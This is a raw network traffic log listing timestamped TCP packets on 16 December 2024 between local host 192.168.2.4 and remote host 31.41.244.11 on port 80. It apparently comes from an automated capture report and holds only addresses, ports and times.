                                                                                                                                                                                              Dec 16, 2024 01:01:35.732564926 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.732651949 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.732682943 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.732733011 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.733710051 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.733761072 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.733841896 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.733891010 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.734822035 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.734874010 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.734941959 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.734986067 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.735961914 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.736093998 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.736156940 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.737073898 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.737202883 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.737253904 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.738240004 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.738277912 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.738298893 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.738343000 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.739306927 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.739365101 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.739432096 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.739700079 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.740431070 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.740484953 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.740550995 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.740600109 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.741549015 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.741688013 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.741751909 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.742670059 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.742721081 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.742798090 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.742846012 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.743815899 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.743865013 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.743918896 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.743968010 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.744915009 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.745040894 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.745086908 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.746040106 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.746089935 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.746155977 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.746205091 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.747208118 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.747344017 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.747395992 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.748328924 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.748378992 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.748383045 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.748430014 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.749408007 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.749464035 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.749528885 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.749577999 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.750531912 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.750585079 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.750668049 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.750720978 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.751652002 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.751698971 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.751766920 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.752783060 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.752835989 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.752901077 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.752949953 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.753880024 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.753931999 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.754010916 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.754066944 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.755038023 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.755085945 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.755152941 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.755196095 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.756129026 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.756215096 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.756258965 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.757265091 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.757313967 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.757359982 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.757406950 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.758457899 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.758507967 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.758527040 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.758565903 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.759489059 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.759531021 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.759629011 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.759669065 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.760613918 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.760654926 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.760744095 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.760786057 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.761750937 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.761797905 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.761840105 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.761884928 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.762850046 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.762960911 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.763009071 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.763969898 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.764018059 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.764090061 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.764132977 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.765315056 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.765352964 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.765419006 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.765461922 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.766206026 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.766249895 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.766297102 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.766335964 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.768528938 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.768627882 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.768671989 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.769033909 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.769077063 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.769128084 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.769172907 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.771253109 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.771363020 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.771406889 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.771809101 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.771855116 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.771898031 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.771938086 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.774027109 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.774071932 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.774141073 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.774180889 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.774579048 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.774619102 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.774672031 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.774712086 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.776446104 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.776530981 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.776567936 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.777009964 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.777050972 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.777098894 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.777137995 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.779372931 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.779510975 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.779516935 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.779561043 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.779894114 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.779939890 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.780051947 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.780349016 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.781812906 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.781866074 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.781933069 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.781980991 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.782398939 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.782445908 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.782511950 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.782562971 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.784372091 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.784524918 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.784576893 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.784889936 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.784940004 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.785036087 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.785083055 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.786763906 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.786808968 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.786813974 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.786845922 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.787298918 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.787380934 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.787405014 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.787450075 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.789184093 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.789237022 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.789264917 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.789725065 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.789781094 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.789844990 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.789895058 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.791534901 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.791584015 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.791627884 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.791672945 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.792109013 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.792159081 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.792221069 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.792277098 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.793869972 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.793920040 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.793962955 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.794009924 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.794447899 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.794514894 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.794536114 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.794583082 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.796346903 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.796416998 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.796483040 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.796525002 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.796853065 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.796906948 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.796971083 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.797014952 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.798666000 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.798737049 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.798789024 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.799261093 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.799319029 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.799365997 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.799448013 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.800276995 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.800327063 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.909168005 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.909224987 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.909307003 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.909343004 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.909373999 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.909398079 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.909621000 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.909749031 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.909785032 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.909785032 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.909815073 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.909827948 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.909989119 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.910193920 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.910355091 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.910440922 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.910468102 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.910505056 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.910537958 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.910557032 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.910769939 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.910900116 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.911283016 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.911391973 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.911443949 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.911536932 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.911571980 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.911616087 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.912154913 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.912211895 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.912281036 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.912316084 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.912331104 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.912368059 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.912554026 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.912606001 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.913053036 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.913105965 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.913175106 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.913209915 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.913235903 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.913352966 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.913434982 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.913486004 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.913990021 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.914058924 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.914123058 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.914170027 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.914171934 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.914249897 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.914392948 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.914447069 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.914891005 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.914949894 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.915018082 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.915060997 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.915102959 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.915286064 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.915338039 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.915813923 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.915868998 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.915915012 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.916032076 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.916081905 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.916129112 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.916678905 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.916743040 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.916810036 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.916846037 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.916903019 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.917081118 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.917208910 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.917566061 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.917613983 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.917680979 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.917716026 CET804982931.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:35.917726994 CET4982980192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:35.917768002 CET4982980192.168.2.431.41.244.11
